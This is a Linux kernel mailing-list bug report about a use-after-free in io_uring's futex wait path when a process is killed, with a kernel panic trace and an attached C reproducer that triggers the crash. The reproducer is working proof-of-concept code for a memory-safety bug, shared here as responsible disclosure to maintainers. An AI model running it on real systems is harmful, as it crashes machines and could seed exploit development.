From: rtm@csail.mit.edu
To: Jens Axboe <axboe@kernel.dk>,
Pavel Begunkov <asml.silence@gmail.com>,
io-uring@vger.kernel.org
Subject: use-after-free if killed while in IORING_OP_FUTEX_WAIT
Date: Wed, 04 Jun 2025 09:58:02 -0400 [thread overview]
Message-ID: <38053.1749045482@localhost> (raw)
[-- Attachment #1: Type: text/plain, Size: 2033 bytes --]
If a process is killed while in IORING_OP_FUTEX_WAIT, do_exit()'s call
to exit_mm() causes the futex_private_hash to be freed, along with its
buckets' locks, while the io_uring request still exists. When (a little
later in do_exit()) the io_uring fd is fput(), the resulting
futex_unqueue() tries to use the freed memory that
req->async_data->lock_ptr points to.
I've attached a demo:
# cc uring46b.c
# ./a.out
killing child
BUG: spinlock bad magic on CPU#0, kworker/u4:1/26
Unable to handle kernel paging request at virtual address 6b6b6b6b6b6b711b
Current kworker/u4:1 pgtable: 4K pagesize, 39-bit VAs, pgdp=0x000000008202a000
[6b6b6b6b6b6b711b] pgd=0000000000000000, p4d=0000000000000000, pud=0000000000000000
Oops [#1]
Modules linked in:
CPU: 0 UID: 0 PID: 26 Comm: kworker/u4:1 Not tainted 6.15.0-11192-ga82d78bc13a8 #553 NONE
Hardware name: riscv-virtio,qemu (DT)
Workqueue: iou_exit io_ring_exit_work
epc : spin_dump+0x38/0x6e
ra : spin_dump+0x30/0x6e
epc : ffffffff80003354 ra : ffffffff8000334c sp : ffffffc600113b60
...
status: 0000000200000120 badaddr: 6b6b6b6b6b6b711b cause: 000000000000000d
[<ffffffff80003354>] spin_dump+0x38/0x6e
[<ffffffff8009b78a>] do_raw_spin_lock+0x10a/0x126
[<ffffffff811e6552>] _raw_spin_lock+0x1a/0x22
[<ffffffff800eb80c>] futex_unqueue+0x2a/0x76
[<ffffffff8069e366>] __io_futex_cancel+0x72/0x88
[<ffffffff806982fe>] io_cancel_remove_all+0x50/0x74
[<ffffffff8069e4ac>] io_futex_remove_all+0x1a/0x22
[<ffffffff80010a7e>] io_uring_try_cancel_requests+0x2e2/0x36e
[<ffffffff80010bf6>] io_ring_exit_work+0xec/0x3f0
[<ffffffff80057f0a>] process_one_work+0x132/0x2fe
[<ffffffff8005888c>] worker_thread+0x21e/0x2fe
[<ffffffff80060428>] kthread+0xe8/0x1ba
[<ffffffff80022fb0>] ret_from_fork_kernel+0xe/0x5e
[<ffffffff811e8566>] ret_from_fork_kernel_asm+0x16/0x18
Code: 4517 018b 0513 ca05 00ef 3b60 2603 0049 2601 c491 (a703) 5b04
---[ end trace 0000000000000000 ]---
Kernel panic - not syncing: Fatal exception
---[ end Kernel panic - not syncing: Fatal exception ]---
Robert Morris
rtm@mit.edu
[-- Attachment #2: uring46b.c --]
[-- Type: application/octet-stream, Size: 6211 bytes --]
#include <stdio.h>
#include <signal.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sys/uio.h>
#include <linux/fs.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <sys/resource.h>
#include <sys/socket.h>
#include <linux/io_uring.h>
int dirfd = -1;
int pfds[2];
int sock = -1;
//
// adapted from:
// https://unixism.net/loti/low_level.html
// https://github.com/shuveb/io_uring-by-example
//
/* Number of entries requested from io_uring_setup() in app_setup_uring(). */
#define QUEUE_DEPTH 1
/* Size and alignment, in bytes, of each buffer allocated in submit_to_sq(). */
#define BLOCK_SZ 1024
/*
 * Application-side view of the submission queue ring.
 *
 * app_setup_uring() points each member at the mapped SQ ring memory plus
 * the matching offset from io_uring_params.sq_off.
 */
struct app_io_sq_ring {
    unsigned int *head;          /* sq_off.head */
    unsigned int *tail;          /* sq_off.tail; advanced by submit_to_sq() */
    unsigned int *ring_mask;     /* sq_off.ring_mask; ANDed with tail to get a slot index */
    unsigned int *ring_entries;  /* sq_off.ring_entries */
    unsigned int *flags;         /* sq_off.flags */
    unsigned int *array;         /* sq_off.array; slot -> SQE index table */
};
/*
 * Application-side view of the completion queue ring.
 *
 * app_setup_uring() points each member at the mapped CQ ring memory plus
 * the matching offset from io_uring_params.cq_off.
 */
struct app_io_cq_ring {
    unsigned int *head;          /* cq_off.head */
    unsigned int *tail;          /* cq_off.tail */
    unsigned int *ring_mask;     /* cq_off.ring_mask */
    unsigned int *ring_entries;  /* cq_off.ring_entries */
    struct io_uring_cqe *cqes;   /* cq_off.cqes; start of the CQE array */
};
/* State for the single io_uring instance this program creates; filled in by app_setup_uring(). */
struct submitter {
/* Descriptor returned by io_uring_setup(). */
int ring_fd;
/* Pointers into the mapped submission queue ring. */
struct app_io_sq_ring sq_ring;
/* Mapped array of submission queue entries (IORING_OFF_SQES mapping). */
struct io_uring_sqe *sqes;
/* Pointers into the mapped completion queue ring. */
struct app_io_cq_ring cq_ring;
};
/*
 * Bookkeeping allocated by submit_to_sq(): a size plus one iovec per
 * BLOCK_SZ-sized block.
 * NOTE(review): looks like a leftover from the readv example this file was
 * adapted from; the visible code fills it in but never submits it.
 */
struct file_info {
/* Copied from the hard-coded file_sz in submit_to_sq(). */
off_t file_sz;
struct iovec iovecs[]; /* One entry per block; no readv/writev is issued in the visible code */
};
/*
 * Invoke the io_uring_setup system call directly via syscall().
 *
 * entries and p are passed through unchanged. Returns the syscall() result
 * converted to int.
 */
int io_uring_setup(unsigned entries, struct io_uring_params *p)
{
    long rc = syscall(__NR_io_uring_setup, entries, p);

    return (int) rc;
}
/*
 * Invoke the io_uring_enter system call directly via syscall().
 *
 * The four arguments are passed through unchanged; the two trailing syscall
 * arguments are always NULL and 0. Returns the syscall() result converted to
 * int.
 */
int io_uring_enter(int ring_fd, unsigned int to_submit,
                   unsigned int min_complete, unsigned int flags)
{
    long rc = syscall(__NR_io_uring_enter, ring_fd, to_submit,
                      min_complete, flags, NULL, 0);

    return (int) rc;
}
/*
 * Create an io_uring instance with QUEUE_DEPTH entries and map its rings.
 *
 * On success s->ring_fd holds the ring descriptor, the members of
 * s->sq_ring and s->cq_ring point into the mapped ring memory at the offsets
 * reported in io_uring_params, and s->sqes points at the mapped SQE array.
 *
 * Returns 0 on success. On failure a perror() diagnostic is printed,
 * everything acquired so far (mappings, ring descriptor) is released,
 * s->ring_fd is set to -1, and 1 is returned.
 */
int app_setup_uring(struct submitter *s) {
    struct app_io_sq_ring *sring = &s->sq_ring;
    struct app_io_cq_ring *cring = &s->cq_ring;
    struct io_uring_params p;
    const int map_prot = PROT_READ | PROT_WRITE;
    const int map_flags = MAP_SHARED | MAP_POPULATE;
    /* char * so that adding byte offsets is standard C, not void * arithmetic. */
    char *sq_base, *cq_base;
    void *sqes;
    size_t sring_sz, cring_sz, sqes_sz;
    int single_mmap;

    memset(&p, 0, sizeof(p));
    s->ring_fd = io_uring_setup(QUEUE_DEPTH, &p);
    if (s->ring_fd < 0) {
        perror("io_uring_setup");
        return 1;
    }

    sring_sz = p.sq_off.array + p.sq_entries * sizeof(unsigned);
    cring_sz = p.cq_off.cqes + p.cq_entries * sizeof(struct io_uring_cqe);
    sqes_sz = p.sq_entries * sizeof(struct io_uring_sqe);

    /* With a single mapping both rings share one region sized for the larger. */
    single_mmap = (p.features & IORING_FEAT_SINGLE_MMAP) != 0;
    if (single_mmap) {
        if (cring_sz > sring_sz)
            sring_sz = cring_sz;
        cring_sz = sring_sz;
    }

    sq_base = mmap(NULL, sring_sz, map_prot, map_flags,
                   s->ring_fd, IORING_OFF_SQ_RING);
    if (sq_base == MAP_FAILED) {
        perror("mmap");
        goto err_close;
    }

    cq_base = sq_base;
    if (!single_mmap) {
        cq_base = mmap(NULL, cring_sz, map_prot, map_flags,
                       s->ring_fd, IORING_OFF_CQ_RING);
        if (cq_base == MAP_FAILED) {
            perror("mmap");
            goto err_unmap_sq;
        }
    }

    sqes = mmap(NULL, sqes_sz, map_prot, map_flags,
                s->ring_fd, IORING_OFF_SQES);
    if (sqes == MAP_FAILED) {
        perror("mmap");
        goto err_unmap_cq;
    }

    sring->head = (unsigned *) (sq_base + p.sq_off.head);
    sring->tail = (unsigned *) (sq_base + p.sq_off.tail);
    sring->ring_mask = (unsigned *) (sq_base + p.sq_off.ring_mask);
    sring->ring_entries = (unsigned *) (sq_base + p.sq_off.ring_entries);
    sring->flags = (unsigned *) (sq_base + p.sq_off.flags);
    sring->array = (unsigned *) (sq_base + p.sq_off.array);

    s->sqes = sqes;

    cring->head = (unsigned *) (cq_base + p.cq_off.head);
    cring->tail = (unsigned *) (cq_base + p.cq_off.tail);
    cring->ring_mask = (unsigned *) (cq_base + p.cq_off.ring_mask);
    cring->ring_entries = (unsigned *) (cq_base + p.cq_off.ring_entries);
    cring->cqes = (struct io_uring_cqe *) (cq_base + p.cq_off.cqes);
    return 0;

    /* perror() has already run, so cleanup cannot disturb the reported errno. */
err_unmap_cq:
    if (cq_base != sq_base)
        munmap(cq_base, cring_sz);
err_unmap_sq:
    munmap(sq_base, sring_sz);
err_close:
    close(s->ring_fd);
    s->ring_fd = -1;
    return 1;
}
/*
 * Queue one IORING_OP_FUTEX_WAIT request on the ring and block in
 * io_uring_enter() until one completion is available.
 *
 * file_path is opened read-only and one BLOCK_SZ-aligned buffer is allocated,
 * as in the readv example this was adapted from; neither is attached to the
 * request. Both stay alive across io_uring_enter() and are released before
 * returning.
 *
 * Returns 0 if io_uring_enter() succeeds, or 1 after printing a diagnostic
 * if open(), allocation, or io_uring_enter() fails.
 */
int submit_to_sq(char *file_path, struct submitter *s) {
    struct app_io_sq_ring *sring = &s->sq_ring;
    struct file_info *fi = NULL;
    struct io_uring_sqe *sqe;
    unsigned index, tail, current_block = 0;
    int rc = 1;
    int ret;
    /*
     * Futex word plus padding. Declared as __u64 so the store below is
     * correctly aligned and does not alias a char array through a wider
     * type. static: the address is handed to the kernel.
     */
    static __u64 futex_words[4];

    int file_fd = open(file_path, O_RDONLY);
    if (file_fd < 0) {
        perror("open");
        return 1;
    }

    off_t file_sz = 2;
    off_t bytes_remaining = file_sz;
    int blocks = (int) file_sz / BLOCK_SZ;
    if (file_sz % BLOCK_SZ)
        blocks++;

    fi = malloc(sizeof(*fi) + sizeof(struct iovec) * blocks);
    if (!fi) {
        fprintf(stderr, "Unable to allocate memory\n");
        goto out;
    }
    fi->file_sz = file_sz;

    while (bytes_remaining) {
        off_t bytes_to_read = bytes_remaining;
        if (bytes_to_read > BLOCK_SZ)
            bytes_to_read = BLOCK_SZ;

        void *block;
        /* posix_memalign() returns the error code; it does not set errno. */
        int err = posix_memalign(&block, BLOCK_SZ, BLOCK_SZ);
        if (err) {
            fprintf(stderr, "posix_memalign: %s\n", strerror(err));
            goto out;
        }
        fi->iovecs[current_block].iov_len = bytes_to_read;
        fi->iovecs[current_block].iov_base = block;
        current_block++;
        bytes_remaining -= bytes_to_read;
    }

    /* Claim the next submission slot. */
    tail = *sring->tail;
    index = tail & *sring->ring_mask;
    sqe = &s->sqes[index];
    sring->array[index] = index;

    /* All bytes 0xff except that the first 64-bit word is 0xffffffff00000000. */
    memset(futex_words, 0xff, sizeof(futex_words));
    futex_words[0] = 0xffffffff00000000ULL;

    /*
     * Fields not written here keep whatever the freshly mapped SQE holds.
     * NOTE(review): the magic values are assumptions to confirm against
     * linux/io_uring.h and the kernel's io_uring futex code:
     *  - flags = 2 is presumably IOSQE_IO_DRAIN;
     *  - fd = 130 is presumably read as futex2 flags
     *    (FUTEX2_SIZE_U32 | FUTEX2_PRIVATE);
     *  - off presumably aliases addr2 (the expected futex value);
     *  - optval presumably aliases addr3 (the futex wait mask).
     */
    sqe->opcode = IORING_OP_FUTEX_WAIT;
    sqe->flags = 2;
    sqe->fd = 130;
    sqe->off = 0;
    sqe->addr = (__u64) (unsigned long) futex_words;
    sqe->len = 0;
    sqe->optval = 0x80000000;

    /* Publish the new tail so the kernel sees the entry. */
    *sring->tail = tail + 1;

    /* Submit one entry and wait for one completion. */
    ret = io_uring_enter(s->ring_fd, 1, 1, IORING_ENTER_GETEVENTS);
    if (ret < 0) {
        perror("io_uring_enter");
        goto out;
    }
    rc = 0;

out:
    if (fi) {
        for (unsigned i = 0; i < current_block; i++)
            free(fi->iovecs[i].iov_base);
        free(fi);
    }
    close(file_fd);
    return rc;
}
/*
 * Reproducer driver.
 *
 * Disables core dumps, recreates the file "z", then forks. The child opens a
 * few descriptors, sets up an io_uring and calls submit_to_sq("z", ...),
 * which blocks in io_uring_enter(). After one second the parent sends
 * SIGKILL to the child and lingers for 200 ms before exiting.
 *
 * Returns 0 normally, 1 if fork() fails.
 */
int
main(void)
{
    struct rlimit r;
    r.rlim_cur = r.rlim_max = 0;
    setrlimit(RLIMIT_CORE, &r);

    unlink("z");
    system("echo hi > z");

    pid_t pid = fork();
    if (pid < 0) {
        /* Must not fall through: kill(-1, SIGKILL) would signal every
         * process this user is allowed to signal. */
        perror("fork");
        return 1;
    }

    if (pid == 0) {
        struct submitter *s;

        /* Best-effort descriptor setup; results are deliberately unchecked. */
        dirfd = open(".", 0);
        socketpair(AF_UNIX, SOCK_STREAM, 0, pfds);
        write(pfds[0], "a", 1);
        write(pfds[1], "b", 1);
        sock = socket(AF_INET, SOCK_DGRAM, 0);

        s = malloc(sizeof(*s));
        if (!s) {
            perror("malloc");
            exit(0);
        }
        memset(s, 0, sizeof(*s));

        if (app_setup_uring(s)) {
            fprintf(stderr, "Unable to setup uring!\n");
            exit(0);
        }
        if (submit_to_sq("z", s)) {
            fprintf(stderr, "Error reading file z\n");
            exit(0);
        }
        printf("child exiting\n");
        exit(0);
    }

    /* Give the child time to reach io_uring_enter() before killing it. */
    sleep(1);
    printf("killing child\n");
    kill(pid, SIGKILL);
    usleep(200000);
    return 0;
}
next reply other threads:[~2025-06-04 14:10 UTC|newest]
Thread overview: 3+ messages / expand[flat|nested] mbox.gz Atom feed top
2025-06-04 13:58 rtm [this message]
2025-06-04 14:12 ` use-after-free if killed while in IORING_OP_FUTEX_WAIT Jens Axboe
2025-06-04 16:22 ` Jens Axboe
Reply instructions:
You may reply publicly to this message via plain-text email
using any one of the following methods:
* Save the following mbox file, import it into your mail client,
and reply-to-all from there: mbox
Avoid top-posting and favor interleaved quoting:
https://en.wikipedia.org/wiki/Posting_style#Interleaved_style
* Reply using the --to, --cc, and --in-reply-to
switches of git-send-email(1):
git send-email \
--in-reply-to=38053.1749045482@localhost \
--to=rtm@csail.mit.edu \
--cc=asml.silence@gmail.com \
--cc=axboe@kernel.dk \
--cc=io-uring@vger.kernel.org \
/path/to/YOUR_REPLY
https://kernel.org/pub/software/scm/git/docs/git-send-email.html
* If your mail client supports setting the In-Reply-To header
via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line
before the message body.
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox